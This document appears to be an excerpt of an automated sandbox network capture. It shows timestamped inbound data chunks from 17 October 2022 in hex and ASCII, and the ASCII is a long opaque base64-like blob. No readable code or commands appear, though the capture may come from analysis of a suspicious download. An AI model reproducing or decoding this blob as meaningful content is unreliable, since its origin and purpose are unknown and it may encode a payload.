                                                                                                                                  2022-10-17 20:07:12 UTC528INData Raw: 36 30 53 6a 59 41 43 34 66 77 75 35 74 53 68 6d 48 79 6e 6b 6c 39 6a 35 4a 55 4e 55 47 42 53 58 34 62 68 4b 6f 57 76 69 41 52 6a 31 69 45 42 78 6c 33 63 36 68 32 53 68 6a 61 43 4d 53 5a 6f 53 66 61 55 6f 4c 6c 36 53 4e 51 32 71 44 45 55 31 74 4b 55 59 6d 68 49 4c 45 78 62 71 67 77 4c 66 4b 38 42 67 34 47 76 56 41 42 4a 44 2f 41 4a 6e 4c 64 49 53 67 75 7a 79 41 52 2b 59 37 4f 67 77 79 65 61 48 54 74 77 6c 42 30 4d 4d 52 55 48 79 55 6f 7a 61 41 55 5a 77 66 73 56 6f 49 48 35 70 59 58 46 78 35 4b 55 43 6b 4d 65 57 6c 4b 4d 31 70 74 6d 58 4c 74 30 53 68 72 52 61 52 75 34 69 4a 6c 4d 35 42 4c 79 42 34 6b 39 31 4b 41 4d 69 42 55 52 56 57 6a 50 49 44 41 37 6a 54 33 4b 41 76 6b 64 52 69 31 44 75 67 7a 53 44 41 36 56 53 67 4d 54 6a 71 31 57 32 53 6a 43 52 62 4c 41
                                                                                                                                  Data Ascii: 60SjYAC4fwu5tShmHynkl9j5JUNUGBSX4bhKoWviARj1iEBxl3c6h2ShjaCMSZoSfaUoLl6SNQ2qDEU1tKUYmhILExbqgwLfK8Bg4GvVABJD/AJnLdISguzyAR+Y7OgwyeaHTtwlB0MMRUHyUozaAUZwfsVoIH5pYXFx5KUCkMeWlKM1ptmXLt0ShrRaRu4iJlM5BLyB4k91KAMiBURVWjPIDA7jT3KAvkdRi1DugzSDA6VSgMTjq1W2SjCRbLA
                                                                                                                                  2022-10-17 20:07:12 UTC529INData Raw: 32 67 37 50 76 57 45 47 79 75 49 41 61 6f 49 34 53 41 6c 67 57 5a 7a 4a 5a 6b 47 6b 4e 6f 47 4a 78 72 4b 45 59 6d 34 69 43 2b 67 4c 66 59 67 33 46 70 46 70 31 6a 34 49 51 41 43 7a 45 42 32 44 61 30 36 6f 51 48 31 42 72 4c 69 76 32 71 77 61 30 30 4c 4f 34 66 57 75 69 42 69 58 69 35 51 5a 79 47 44 6a 52 77 4b 6f 41 4d 67 57 67 73 7a 64 50 75 51 4e 78 74 32 48 62 78 51 4b 62 32 49 42 4a 45 56 61 4f 31 55 67 78 4a 4a 6a 55 56 30 51 5a 33 49 30 4a 4c 6b 49 4e 6b 51 34 44 63 6b 6f 43 58 4e 5a 68 77 57 38 59 51 59 58 45 6d 72 73 48 68 49 4e 2b 56 32 72 71 67 78 4c 4f 78 71 32 71 41 5a 51 51 66 6c 42 6a 70 32 51 59 33 48 2b 45 5a 5a 66 6c 45 55 37 70 41 58 4e 44 7a 33 44 30 51 5a 79 53 4d 67 35 49 32 51 41 45 68 78 48 54 62 33 49 43 2b 52 65 51 66 38 54 66 61 67
                                                                                                                                  Data Ascii: 2g7PvWEGyuIAaoI4SAlgWZzJZkGkNoGJxrKEYm4iC+gLfYg3FpFp1j4IQACzEB2Da06oQH1BrLiv2qwa00LO4fWuiBiXi5QZyGDjRwKoAMgWgszdPuQNxt2HbxQKb2IBJEVaO1UgxJJjUV0QZ3I0JLkINkQ4DckoCXNZhwW8YQYXEmrsHhIN+V2rqgxLOxq2qAZQQflBjp2QY3H+EZZflEU7pAXNDz3D0QZySMg5I2QAEhxHTb3IC+ReQf8Tfag
                                                                                                                                  2022-10-17 20:07:12 UTC530INData Raw: 6a 58 61 57 5a 51 59 73 48 66 33 2b 62 31 51 43 52 61 41 43 4d 6a 41 75 50 6a 71 6c 42 71 37 47 47 67 31 66 70 4b 44 43 54 41 4c 50 7a 56 74 58 51 45 6e 6a 35 54 55 2b 39 41 41 2f 79 6b 47 6c 53 57 6a 68 41 49 71 53 53 4c 71 6b 55 43 41 73 41 4a 50 79 69 43 4b 39 45 6f 50 38 41 37 30 73 44 31 51 41 6b 69 4e 4e 53 66 67 79 41 45 76 42 47 73 62 76 56 41 47 44 4d 62 51 43 7a 45 68 6e 72 38 56 61 4d 62 52 6f 4e 6d 71 2b 2f 73 79 55 4a 55 51 59 47 6b 39 31 61 47 4f 67 71 53 58 72 33 55 41 64 79 41 58 6c 74 6c 52 6f 75 4d 4f 41 58 30 6a 75 67 4e 4e 4b 43 69 6c 41 42 4a 42 59 45 41 65 4d 4b 6a 4d 37 77 35 45 7a 41 31 64 51 4a 63 47 64 33 36 56 44 64 4f 55 41 6d 6b 47 77 43 64 55 6f 78 68 33 4e 42 44 61 44 78 33 51 4b 44 52 79 64 41 77 4f 74 55 51 44 38 78 4c 39
                                                                                                                                  Data Ascii: jXaWZQYsHf3+b1QCRaACMjAuPjqlBq7GGg1fpKDCTALPzVtXQEnj5TU+9AA/ykGlSWjhAIqSSLqkUCAsAJPyiCK9EoP8A70sD1QAkiNNSfgyAEvBGsbvVAGDMbQCzEhnr8VaMbRoNmq+/syUJUQYGk91aGOgqSXr3UAdyAXltlRouMOAX0jugNNKCilABJBYEAeMKjM7w5EzA1dQJcGd36VDdOUAmkGwCdUoxh3NBDaDx3QKDRydAwOtUQD8xL9
                                                                                                                                  2022-10-17 20:07:12 UTC532INData Raw: 45 43 45 56 2f 77 36 67 2f 63 71 46 75 41 6c 6e 41 75 4b 42 43 4e 6f 6c 71 61 37 6f 4a 33 48 58 78 4c 49 45 49 4a 65 68 63 56 66 52 55 54 75 44 45 6e 55 36 2b 33 52 42 48 55 75 65 6e 4b 42 51 44 4c 6c 32 54 4b 59 53 59 56 45 39 30 56 43 34 54 4f 76 77 56 52 7a 47 43 77 6f 58 63 44 77 56 45 53 4e 69 30 50 43 49 6a 66 52 36 38 4b 34 48 4c 63 48 42 6a 6f 66 59 71 34 48 4e 64 55 68 76 46 42 4a 6a 6b 33 6d 6a 4c 6b 39 50 46 6e 41 35 44 61 72 57 52 31 32 65 2b 69 7a 6c 56 37 64 78 58 51 6f 72 72 74 48 47 79 67 36 4c 53 4a 75 33 2b 43 6d 52 61 31 68 79 4e 4b 66 42 46 64 46 67 68 33 41 4f 2b 69 67 36 41 47 42 31 59 65 78 52 56 37 61 77 59 55 44 68 70 41 37 6f 6d 44 69 30 77 77 71 61 76 75 6c 56 63 41 47 47 70 54 34 4b 55 4d 48 65 34 30 47 73 6f 4c 57 67 58 4f 4e
                                                                                                                                  Data Ascii: ECEV/w6g/cqFuAlnAuKBCNolqa7oJ3HXxLIEIJehcVfRUTuDEnU6+3RBHUuenKBQDLl2TKYSYVE90VC4TOvwVRzGCwoXcDwVESNi0PCIjfR68K4HLcHBjofYq4HNdUhvFBJjk3mjLk9PFnA5DarWR12e+izlV7dxXQorrtHGyg6LSJu3+CmRa1hyNKfBFdFgh3AO+ig6AGB1YexRV7awYUDhpA7omDi0wwqavulVcAGGpT4KUMHe40GsoLWgXON
                                                                                                                                  2022-10-17 20:07:12 UTC533INData Raw: 64 66 5a 31 49 4b 69 35 73 74 42 51 48 33 70 41 39 70 4c 47 6a 73 37 39 65 69 51 59 79 47 78 49 65 70 2b 78 55 55 45 50 46 61 36 44 75 73 35 47 63 31 6b 6e 57 30 48 34 53 72 41 32 57 70 74 62 4b 6f 50 43 52 52 65 68 49 37 44 63 6f 48 42 74 74 41 42 62 59 42 49 47 79 46 42 4a 50 32 4a 41 70 75 79 59 59 74 70 74 32 68 49 4e 6b 48 63 6d 73 57 6e 72 73 6b 42 4e 7a 69 51 5a 68 68 79 6b 42 42 31 4c 68 74 41 47 2b 47 71 67 64 32 4c 67 67 41 62 71 4b 55 58 55 61 31 6d 2f 4d 41 33 68 34 71 78 42 79 41 63 73 57 32 66 6e 71 79 6b 56 6e 31 49 41 32 63 30 56 52 73 6d 4e 78 6d 35 71 4a 42 73 67 48 74 6f 35 6a 66 77 53 41 53 61 31 4d 62 48 64 42 73 71 41 57 67 45 48 7a 31 53 41 35 52 6f 37 51 58 69 53 6b 47 79 42 32 59 54 38 55 69 6d 6c 68 6b 53 4b 65 78 4b 52 44 41 74
                                                                                                                                  Data Ascii: dfZ1IKi5stBQH3pA9pLGjs79eiQYyGxIep+xUUEPFa6Dus5Gc1knW0H4SrA2WptbKoPCRRehI7DcoHBttABbYBIGyFBJP2JApuyYYtpt2hINkHcmsWnrskBNziQZhhykBB1LhtAG+Gqgd2LggAbqKUXUa1m/MA3h4qxByAcsW2fnqykVn1IA2c0VRsmNxm5qJBsgHto5jfwSASa1MbHdBsqAWgEHz1SA5Ro7QXiSkGyB2YT8UimlhkSKexKRDAt
                                                                                                                                  2022-10-17 20:07:12 UTC534INData Raw: 36 56 41 61 4f 58 68 57 68 71 41 44 73 36 69 73 48 65 36 4b 30 50 73 79 55 4c 53 6c 6f 42 6b 6c 35 37 71 31 42 2b 59 74 4d 4e 33 55 6f 7a 76 4e 76 56 74 36 4d 71 4e 38 73 47 33 74 38 57 53 68 72 52 4c 58 42 36 6b 4f 70 56 4e 75 77 65 72 41 46 68 30 43 55 43 61 67 67 67 52 61 33 32 6c 57 6f 4c 4e 71 34 49 5a 6d 30 47 69 56 51 47 49 2b 59 79 47 63 46 6b 71 43 2f 5a 79 2f 77 42 78 55 55 51 37 6b 30 63 2f 64 4b 55 41 50 55 4f 5a 6f 2b 36 55 45 50 42 6f 47 70 38 41 6c 41 42 4a 41 4f 68 46 58 6e 6f 67 49 41 49 61 31 67 4b 67 69 6a 70 52 67 61 75 47 30 62 78 31 51 5a 68 55 41 54 38 55 6f 55 48 5a 33 50 42 66 66 56 56 47 42 68 78 2b 59 68 41 31 6f 4c 45 58 54 76 74 35 71 5a 79 70 53 58 75 63 62 66 6c 4a 62 58 5a 56 42 61 47 2f 4b 4a 6d 67 38 45 6f 42 44 33 42 35
                                                                                                                                  Data Ascii: 6VAaOXhWhqADs6isHe6K0PsyULSloBkl57q1B+YtMN3UozvNvVt6MqN8sG3t8WShrRLXB6kOpVNuwerAFh0CUCagggRa32lWoLNq4IZm0GiVQGI+YyGcFkqC/Zy/wBxUUQ7k0c/dKUAPUOZo+6UEPBoGp8AlABJAOhFXnogIAIa1gKgijpRgauG0bx1QZhUAT8UoUHZ3PBffVVGBhx+YhA1oLEXTvt5qZypSXucbflJbXZVBaG/KJmg8EoBD3B5
                                                                                                                                  2022-10-17 20:07:12 UTC536INData Raw: 50 4b 4b 44 75 51 57 63 6b 4d 39 73 78 72 35 6f 6a 4e 72 55 47 42 45 41 49 72 47 4b 7a 4f 6a 2b 4c 49 67 78 52 38 57 2f 4b 48 31 39 69 69 74 38 7a 61 67 69 47 4a 6e 72 79 67 7a 68 32 41 4a 5a 70 30 71 67 41 59 67 69 72 36 36 6e 32 71 69 4d 61 7a 53 65 42 52 30 47 6e 45 6b 43 6f 6a 70 32 52 57 41 2b 61 54 42 70 37 30 42 4a 63 5a 41 74 46 42 71 67 42 4e 6f 6f 53 43 37 74 55 6f 6a 45 53 57 30 32 41 72 6f 45 42 44 75 63 51 77 45 4e 43 4b 41 6b 77 43 41 65 47 59 2b 77 52 47 63 6c 73 58 6f 34 67 49 70 70 47 6e 42 31 36 49 41 47 4e 57 4e 70 6d 4a 66 76 77 69 41 41 37 31 42 6f 78 6e 65 71 44 43 37 6f 51 50 7a 44 64 2b 45 67 49 48 7a 51 77 41 44 41 49 6f 53 4c 6f 6e 2f 4a 64 79 33 4c 38 6f 47 4d 44 38 6f 6f 78 65 41 33 6d 67 41 42 74 5a 79 34 63 4e 44 4d 69 46 63
                                                                                                                                  Data Ascii: PKKDuQWckM9sxr5ojNrUGBEAIrGKzOj+LIgxR8W/KH19iit8zagiGJnrygzh2AJZp0qgAYgir66n2qiMazSeBR0GnEkCojp2RWA+aTBp70BJcZAtFBqgBNooSC7tUojESW02AroEBDucQwENCKAkwCAeGY+wRGclsXo4gIppGnB16IAGNWNpmJfvwiAA71BoxneqDC7oQPzDd+EgIHzQwADAIoSLon/Jdy3L8oGMD8ooxeA3mgABtZy4cNDMiFc
                                                                                                                                  2022-10-17 20:07:12 UTC537INData Raw: 77 49 4b 55 45 56 5a 2f 77 44 68 42 4b 4e 77 51 78 49 6c 41 41 7a 43 37 46 67 48 62 75 6c 51 58 33 69 5a 50 47 69 4b 55 6e 45 4f 42 49 35 6a 37 45 6f 58 57 54 51 69 4b 70 51 64 69 58 41 64 41 47 49 41 34 45 73 50 63 6c 42 6b 78 42 5a 36 7a 77 6c 43 73 51 62 6f 47 4c 54 4e 64 2f 63 72 55 45 34 67 66 4e 49 41 59 6b 36 67 4b 56 53 6e 38 78 75 79 61 33 55 66 46 6c 61 68 69 53 53 77 36 6a 32 62 68 52 52 49 44 69 75 34 43 55 59 62 6d 6c 51 55 6f 58 49 69 53 47 41 33 68 55 4b 78 63 75 39 7a 55 53 6a 41 47 41 4b 44 6e 32 30 53 68 51 77 2f 79 64 32 2b 50 69 72 55 4d 32 4d 42 67 4b 6b 71 56 51 46 77 65 34 76 46 46 51 4c 69 48 66 6d 56 4b 4a 6b 77 62 6d 4a 34 42 4b 71 44 4d 46 32 68 37 6b 6f 58 38 74 78 69 4b 6d 35 36 41 71 56 41 75 49 42 62 46 75 45 77 46 6d 43 48
                                                                                                                                  Data Ascii: wIKUEVZ/wDhBKNwQxIlAAzC7FgHbulQX3iZPGiKUnEOBI5j7EoXWTQiKpQdiXAdAGIA4EsPclBkxBZ6zwlCsQboGLTNd/crUE4gfNIAYk6gKVSn8xuya3UfFlahiSSw6j2bhRRIDiu4CUYbmlQUoXIiSGA3hUKxcu9zUSjAGAKDn20ShQw/yd2+PirUM2MBgKkqVQFwe4vFFQLiHfmVKJkwbmJ4BKqDMF2h7koX8txiKm56AqVAuIBbFuEwFmCH
                                                                                                                                  2022-10-17 20:07:12 UTC538INData Raw: 43 45 69 43 77 61 69 42 48 59 4f 4a 66 32 4b 43 52 65 58 6b 69 66 46 31 6f 54 75 75 37 6d 6a 6e 37 6b 45 62 6d 6f 65 48 4f 69 44 47 6d 6a 31 5a 51 63 35 67 55 79 6d 69 6f 6c 63 44 78 78 38 56 52 7a 33 47 72 53 2f 76 56 48 50 64 63 4a 42 6f 4b 4f 69 49 33 33 4f 43 38 41 56 5a 56 48 4c 66 51 69 64 68 37 46 55 63 31 39 30 74 74 56 49 49 73 63 33 69 71 74 52 77 57 58 41 62 6c 79 71 4f 71 79 34 45 75 7a 79 6f 52 30 32 33 4e 4a 70 52 52 58 54 5a 66 37 65 78 52 58 54 5a 66 44 38 51 6f 52 30 57 33 43 6e 6b 6f 4c 32 33 68 78 71 51 56 46 58 39 4f 38 4f 7a 36 4b 43 77 75 41 6b 4f 59 67 49 4b 69 37 74 56 6d 33 51 68 38 33 59 37 6d 6d 34 51 57 74 76 4a 30 2b 55 39 46 46 68 37 53 34 38 73 66 77 56 70 44 32 33 4d 34 70 76 48 34 71 5a 46 51 52 57 62 68 52 51 68 38 32 4c
                                                                                                                                  Data Ascii: CEiCwaiBHYOJf2KCReXkifF1oTuu7mjn7kEbmoeHOiDGmj1ZQc5gUymiolcDxx8VRz3GrS/vVHPdcJBoKOiI33OC8AVZVHLfQidh7FUc190ttVIIsc3iqtRwWXAblyqOqy4EuzyoR023NJpRRXTZf7exRXTZfD8QoR0W3CnkoL23hxqQVFX9O8Oz6KCwuAkOYgIKi7tVm3Qh83Y7mm4QWtvJ0+U9FFh7S48sfwVpD23M4pvH4qZFQRWbhRQh82L
                                                                                                                                  2022-10-17 20:07:12 UTC540INData Raw: 6f 4b 68 68 49 31 4b 41 75 37 69 68 32 51 56 74 4c 53 49 66 58 32 4b 43 6f 5a 6a 55 36 45 49 47 42 70 4d 61 48 5a 41 39 76 79 73 35 71 58 6c 52 54 68 77 78 59 52 4c 42 41 34 49 4a 45 69 33 55 50 74 73 67 4d 32 7a 55 56 50 52 41 37 69 6a 44 72 78 6f 70 41 51 64 4f 49 42 4b 67 49 42 45 47 68 4e 4b 36 4b 30 59 79 30 54 6f 56 56 47 72 6d 66 38 41 4a 2b 33 7a 55 42 46 31 43 58 49 75 4c 71 68 67 58 4a 59 4d 52 54 53 44 52 51 41 42 67 77 44 75 38 36 65 53 6f 4c 4d 78 72 7a 76 73 67 59 43 65 6a 2b 61 67 55 77 58 4a 30 59 6d 6b 38 71 67 41 43 41 34 4a 4d 47 64 70 2b 4b 42 73 73 53 4e 48 38 74 31 49 47 79 4c 51 48 36 30 53 44 43 68 6f 78 70 30 30 44 49 43 54 6f 77 4d 54 38 46 41 41 4b 7a 71 38 52 58 6f 67 30 51 52 71 64 50 59 49 4d 41 44 38 77 63 5a 50 42 47 39 55
                                                                                                                                  Data Ascii: oKhhI1KAu7ih2QVtLSIfX2KCoZjU6EIGBpMaHZA9vys5qXlRThwxYRLBA4IJEi3UPtsgM2zUVPRA7ijDrxopAQdOIBKgIBEGhNK6K0Yy0ToVVGrmf8AJ+3zUBF1CXIuLqhgXJYMRTSDRQABgwDu86eSoLMxrzvsgYCej+agUwXJ0Ymk8qgACA4JMGdp+KBssSNH8t1IGyLQH60SDChoxp00DICTowMT8FAAKzq8RXog0QRqdPYIMAD8wcZPBG9U
                                                                                                                                  2022-10-17 20:07:12 UTC540INData Raw: 38 30 30 30 0d 0a 74 61 58 5a 7a 32 51 45 6b 73 43 4e 4e 59 51 62 4a 78 46 41 57 59 68 49 4d 42 4e 70 4c 6b 6a 58 33 6f 41 61 73 5a 50 38 51 30 38 55 42 49 44 79 65 51 43 48 68 42 75 4d 58 74 4f 30 6f 42 4e 30 41 67 6a 78 51 46 36 37 53 7a 46 6b 47 35 6b 50 39 72 6f 41 5a 62 66 53 4e 57 35 45 49 43 53 41 61 31 31 68 41 41 48 6a 35 57 65 4e 77 32 2f 52 42 74 77 34 2f 79 6d 32 6c 41 58 75 63 45 4d 41 49 50 58 79 51 61 70 49 59 68 78 49 71 67 46 32 78 71 32 7a 70 67 59 45 45 79 42 49 68 74 6c 52 68 63 44 54 2f 6a 61 39 6c 49 46 46 77 30 41 6c 7a 6c 33 66 75 72 42 6d 4d 50 4a 71 37 49 4d 2f 44 76 70 30 4e 45 41 65 68 2f 4e 73 58 31 56 47 35 62 72 62 30 51 44 6e 2b 45 31 39 6d 51 47 34 4f 51 31 32 4c 46 4d 44 45 30 41 4a 50 4d 31 32 64 51 4b 58 75 68 32 48 6d
                                                                                                                                  Data Ascii: 8000taXZz2QEksCNNYQbJxFAWYhIMBNpLkjX3oAasZP8Q08UBIDyeQCHhBuMXtO0oBN0AgjxQF67SzFkG5kP9roAZbfSNW5EICSAa11hAAHj5WeNw2/RBtw4/ym2lAXucEMAIPXyQapIYhxIqgF2xq2zpgYEEyBIhtlRhcDT/ja9lIFFw0Alzl3furBmMPJq7IM/Dvp0NEAeh/NsX1VG5brb0QDn+E19mQG4OQ12LFMDE0AJPM12dQKXuh2Hm
                                                                                                                                  2022-10-17 20:07:12 UTC541INData Raw: 59 49 63 42 2f 6d 71 67 6d 53 44 46 74 41 59 51 4b 5a 71 32 33 68 73 6c 43 45 6d 34 31 48 63 55 56 51 44 57 72 6b 31 4b 56 55 72 69 4b 55 71 79 55 53 79 6b 68 32 62 72 50 52 45 4b 37 53 50 77 2b 4b 43 64 31 32 6f 41 6f 57 43 43 64 78 5a 39 5a 47 53 59 56 43 36 34 53 65 37 71 6f 69 64 7a 2b 43 74 45 4c 72 69 54 42 42 33 4c 6f 6a 6e 75 75 45 37 45 73 36 6f 68 66 64 42 49 68 35 56 48 4d 53 51 2f 6c 73 71 79 35 37 79 4a 30 32 54 41 67 2f 7a 2f 42 55 63 4e 68 34 51 58 74 4e 50 4a 42 30 32 45 77 65 6e 5a 51 64 4e 68 67 50 48 66 56 51 64 4e 70 41 50 57 71 69 72 32 48 62 53 6f 68 54 4b 75 69 30 73 58 4e 47 39 69 67 75 43 37 52 46 58 55 46 52 63 58 64 32 48 38 49 35 53 4b 74 61 57 37 53 56 42 65 64 4e 4a 6f 69 71 41 67 36 37 4f 56 42 54 4b 48 5a 75 61 70 67 45 58
                                                                                                                                  Data Ascii: YIcB/mqgmSDFtAYQKZq23hslCEm41HcUVQDWrk1KVUriKUqyUSykh2brPREK7SPw+KCd12oAoWCCdxZ9ZGSYVC64Se7qoidz+CtELriTBB3LojnuuE7Es6ohfdBIh5VHMSQ/lsqy57yJ02TAg/z/BUcNh4QXtNPJB02EwenZQdNhgPHfVQdNpAPWqir2HbSohTKui0sXNG9iguC7RFXUFRcXd2H8I5SKtaW7SVBedNJoiqAg67OVBTKHZuapgEX
                                                                                                                                  2022-10-17 20:07:12 UTC543INData Raw: 67 76 76 76 32 55 42 46 44 4d 6d 6f 4d 2f 59 71 43 51 51 50 7a 4e 73 58 5a 41 63 6a 30 69 70 70 4b 6b 42 59 55 59 63 39 48 51 46 6a 63 42 38 56 41 51 57 6d 6d 36 41 4f 78 66 51 37 30 39 36 6f 49 4c 36 73 47 59 4e 37 30 57 74 71 43 7a 4e 4c 69 6e 4f 36 41 6d 41 53 4b 6d 73 46 41 51 54 4f 4e 77 4a 5a 32 51 59 58 58 55 50 45 63 64 6b 42 4a 4e 4a 66 2f 41 42 42 41 52 64 54 6e 57 6e 69 67 77 46 64 72 76 45 2b 4b 41 6d 57 6d 4e 36 55 38 45 47 6d 70 6f 4a 47 36 42 63 6d 49 4a 44 4d 4b 68 57 42 67 78 66 35 5a 36 56 64 51 5a 32 5a 71 2b 32 37 49 41 2f 59 77 43 4f 32 69 41 51 5a 49 6d 36 67 64 2f 44 52 41 30 73 33 38 4a 45 45 61 31 51 61 58 6a 57 6a 7a 53 71 44 46 32 4a 71 57 33 70 33 51 46 32 75 45 73 2f 6d 55 41 46 77 64 6e 2f 4b 59 46 61 30 51 59 50 70 65 34 61
                                                                                                                                  Data Ascii: gvvv2UBFDMmoM/YqCQQPzNsXZAcj0ippKkBYUYc9HQFjcB8VAQWmm6AOxfQ7096oIL6sGYN70WtqCzNLinO6AmASKmsFAQTONwJZ2QYXXUPEcdkBJNJf/ABBARdTnWnigwFdrvE+KAmWmN6U8EGmpoJG6BcmIJDMKhWBgxf5Z6VdQZ2Zq+27IA/YwCO2iAQZIm6gd/DRA0s38JEEa1QaXjWjzSqDF2JqW3p3QF2uEs/mUAFwdn/KYFa0QYPpe4a
                                                                                                                                  2022-10-17 20:07:12 UTC544INData Raw: 46 77 66 38 78 4c 51 77 53 41 41 6d 66 6c 59 47 41 71 47 6f 4e 79 4e 54 30 33 55 49 41 75 64 34 2b 56 32 68 49 6a 41 75 4e 62 6e 41 6e 37 6b 56 68 63 34 6c 79 2b 75 6a 65 61 51 45 6d 42 45 2b 4a 51 62 4a 74 44 6f 6b 47 63 4f 78 50 4c 64 53 67 78 6b 48 56 36 67 42 43 4d 43 7a 6c 6a 4d 6b 61 6c 42 6e 6c 69 35 62 2b 4a 41 48 63 6b 61 56 59 38 6f 52 68 4e 72 68 32 49 6a 56 76 4e 30 49 4a 61 6a 47 34 38 6f 52 6a 63 47 70 46 53 79 51 43 51 58 44 36 68 7a 58 32 64 43 4e 6c 41 42 4d 37 38 67 4b 77 48 55 53 57 4d 2b 37 6f 6f 52 74 75 42 30 51 6a 43 34 46 6e 31 4d 44 7a 6c 49 42 6b 41 78 64 75 49 51 67 5a 53 51 41 53 38 45 61 4f 79 45 62 36 6a 6d 4a 46 45 67 47 52 49 75 59 4d 58 31 2f 46 41 4d 2b 58 32 53 44 50 6f 57 49 45 59 37 4a 41 75 54 4f 53 7a 45 51 50 75 53
                                                                                                                                  Data Ascii: Fwf8xLQwSAAmflYGAqGoNyNT03UIAud4+V2hIjAuNbnAn7kVhc4ly+ujeaQEmBE+JQbJtDokGcOxPLdSgxkHV6gBCMCzljMkalBnli5b+JAHckaVY8oRhNrh2IjVvN0IJajG48oRjcGpFSyQCQXD6hzX2dCNlABM78gKwHUSWM+7ooRtuB0QjC4Fn1MDzlIBkAxduIQgZSQAS8EaOyEb6jmJFEgGRIuYMX1/FAM+X2SDPoWIEY7JAuTOSzEQPuS
                                                                                                                                  2022-10-17 20:07:12 UTC545INData Raw: 41 43 5a 4c 6e 68 68 35 49 46 79 59 45 69 32 6a 74 50 69 67 41 4a 61 48 48 58 70 6f 67 56 77 2b 70 64 33 4f 79 42 63 74 58 46 70 71 4f 53 72 42 72 69 51 78 71 61 4f 55 43 50 74 38 75 71 6f 6e 6b 78 41 46 52 54 58 68 41 4d 69 59 71 31 54 73 68 51 64 6d 44 74 78 2b 4b 49 45 30 67 6b 4d 41 67 6d 62 6d 68 70 61 6e 41 52 53 45 68 39 7a 4c 6f 45 79 74 4e 43 58 4a 64 42 49 33 46 6f 69 56 52 4d 33 36 67 6e 55 2f 63 6b 52 45 6b 69 68 64 36 4b 68 44 65 4e 2b 36 51 52 4a 61 49 47 77 56 52 43 36 36 53 4d 70 32 51 51 4a 46 58 48 4c 4b 69 52 4a 42 59 6e 32 43 49 35 37 37 6e 64 71 30 4b 44 6e 76 75 4d 6a 66 64 56 45 4c 72 74 33 4f 34 43 6f 35 37 79 77 61 47 64 4d 43 4f 65 72 6e 64 55 65 64 62 66 70 44 61 4b 6f 36 51 57 2b 4b 69 75 6d 79 36 6b 2b 77 55 79 72 6f 73 75 67
                                                                                                                                  Data Ascii: ACZLnhh5IFyYEi2jtPigAJaHHXpogVw+pd3OyBctXFpqOSrBriQxqaOUCPt8uqonkxAFRTXhAMiYq1TshQdmDtx+KIE0gkMAgmbmhpanARSEh9zLoEytNCXJdBI3FoiVRM36gnU/ckREkihd6KhDeN+6QRJaIGwVRC66SMp2QQJFXHLKiRJBYn2CI577ndq0KDnvuMjfdVELrt3O4Co57ywaGdMCOerndUedbfpDaKo6QW+Kiumy6k+wUyrosug
                                                                                                                                  2022-10-17 20:07:12 UTC547INData Raw: 4e 76 75 46 46 55 46 35 59 61 63 4f 6b 46 42 63 31 53 65 71 43 67 76 65 6a 6b 61 2b 39 41 34 76 70 33 62 37 46 41 77 76 49 6f 78 47 79 51 4f 4c 6f 4c 44 37 55 44 67 78 6f 39 53 79 69 51 52 64 6b 4e 35 66 32 64 41 58 4a 42 71 52 2f 43 56 51 7a 2f 4b 77 48 55 63 4b 4b 59 58 69 4b 44 70 37 6b 42 79 62 6c 77 59 51 4e 6b 39 44 77 53 67 49 75 63 33 42 33 46 33 74 73 67 4d 44 6f 4b 44 5a 41 7a 7a 52 33 32 55 42 64 78 56 39 62 58 51 45 58 43 53 5a 65 54 74 52 41 52 66 57 67 2b 35 41 58 41 42 35 59 52 38 61 6f 47 74 75 4e 52 71 61 62 64 58 52 52 46 78 71 2f 47 36 41 67 75 33 69 43 45 47 42 61 57 4c 62 44 32 43 49 4f 56 74 58 71 59 5a 42 6f 4a 4f 33 6d 67 77 49 49 59 4e 48 4b 41 73 35 49 64 2f 62 68 41 58 63 6d 68 32 43 6b 56 67 39 73 74 79 65 79 49 4f 38 54 51 33
                                                                                                                                  Data Ascii: NvuFFUF5YacOkFBc1SeqCgvejka+9A4vp3b7FAwvIoxGyQOLoLD7UDgxo9SyiQRdkN5f2dAXJBqR/CVQz/KwHUcKKYXiKDp7kByblwYQNk9DwSgIuc3B3F3tsgMDoKDZAzzR32UBdxV9bXQEXCSZeTtRARfWg+5AXAB5YR8aoGtuNRqabdXRRFxq/G6Agu3iCEGBaWLbD2CIOVtXqYZBoJO3mgwIIYNHKAs5Id/bhAXcmh2CkVg9styeyIO8TQ3
                                                                                                                                  2022-10-17 20:07:12 UTC548INData Raw: 53 67 7a 6b 31 49 48 64 30 43 67 6d 76 44 6a 53 4f 55 51 53 53 53 39 57 45 6a 55 4a 52 67 66 65 4b 6c 46 42 6d 6b 73 39 55 71 4d 59 6c 36 55 46 45 71 69 38 55 59 74 72 4d 39 45 41 69 42 74 4c 4d 6c 51 64 6e 50 77 53 67 45 69 67 75 59 76 52 33 39 6d 53 6a 45 69 42 44 55 4b 56 51 42 69 43 65 57 39 69 6c 52 6e 42 44 43 58 71 79 55 41 6b 2f 34 58 34 50 58 64 4b 44 6c 4d 78 75 31 4a 53 71 44 6c 33 30 46 44 31 53 67 5a 79 48 64 41 48 44 4f 54 52 79 2f 4b 56 41 4a 48 79 69 49 69 55 71 67 43 4b 4e 58 52 4b 6a 4f 54 62 53 75 2b 71 56 51 4e 37 43 30 50 33 66 52 45 44 49 58 46 77 35 61 69 4b 47 59 36 4d 71 67 46 33 47 31 75 68 31 32 51 42 7a 75 7a 7a 38 4b 46 41 44 63 4b 41 64 69 46 61 42 6b 47 30 6e 58 52 4b 42 64 64 6f 37 55 62 56 53 67 43 35 67 42 4c 37 4a 51 75
                                                                                                                                  Data Ascii: Sgzk1IHd0CgmvDjSOUQSSS9WEjUJRgfeKlFBmks9UqMYl6UFEqi8UYtrM9EAiBtLMlQdnPwSgEiguYvR39mSjEiBDUKVQBiCeW9ilRnBDCXqyUAk/4X4PXdKDlMxu1JSqDl30FD1SgZyHdAHDOTRy/KVAJHyiIiUqgCKNXRKjOTbSu+qVQN7C0P3fREDIXFw5aiKGY6MqgF3G1uh12QBzuzz8KFADcKAdiFaBkG0nXRKBddo7UbVSgC5gBL7JQu
